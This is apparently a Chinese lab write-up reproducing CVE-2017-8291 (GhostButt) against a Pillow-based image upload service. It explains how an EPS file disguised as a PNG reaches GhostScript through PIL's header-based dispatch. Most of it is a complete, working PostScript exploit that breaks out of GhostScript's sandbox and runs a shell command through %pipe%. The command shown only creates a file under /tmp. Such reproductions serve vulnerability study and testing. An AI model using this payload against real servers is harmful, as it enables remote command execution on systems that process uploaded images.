Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。
docker-compose up -d 运行后,访问http://192.168.184.130:8000/
正常功能是上传一个PNG文件,后端调用PIL加载图片,输出长宽。攻击者可以上传EPS文件后缀修改为PNG进行文件上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。
# POC.png %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /size_from 10000 def /size_step 500 def /size_to 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 size_from size_step size_to { pop 1 add } for /buffercount exch def /buffersizes buffercount array def 0 size_from size_step size_to { buffersizes exch 2 index exch put 1 add } for pop /buffers buffercount array def 0 1 buffercount 1 sub { /ind exch def buffersizes ind get /cursize exch def cursize string /curbuf exch def buffers ind curbuf put cursize 16 sub 1 cursize 1 sub { curbuf exch 255 put } for } for /buffersearchvars [0 0 0 0 0] def /sdevice [0] def enlarge array aload { .eqproc buffersearchvars 0 buffersearchvars 0 get 1 add put buffersearchvars 1 0 put buffersearchvars 2 0 put buffercount { buffers buffersearchvars 1 get get buffersizes buffersearchvars 1 get get 16 sub get 254 le { buffersearchvars 2 1 put buffersearchvars 3 buffers buffersearchvars 1 get get put buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put } if buffersearchvars 1 buffersearchvars 1 get 1 add put } repeat buffersearchvars 2 get 1 ge { exit } if %(.) print } loop .eqproc .eqproc .eqproc sdevice 0 currentdevice buffersearchvars 3 get buffersearchvars 4 get 16#7e put buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put put buffersearchvars 0 get array aload sdevice 0 get 16#3e8 0 put sdevice 0 get 16#3b0 0 put sdevice 0 get 16#3f0 0 put currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa) .putdeviceparams 1 true .outputpage .rsdparams %{ } loop 0 0 .quit %asdf
上传后查看创建的文件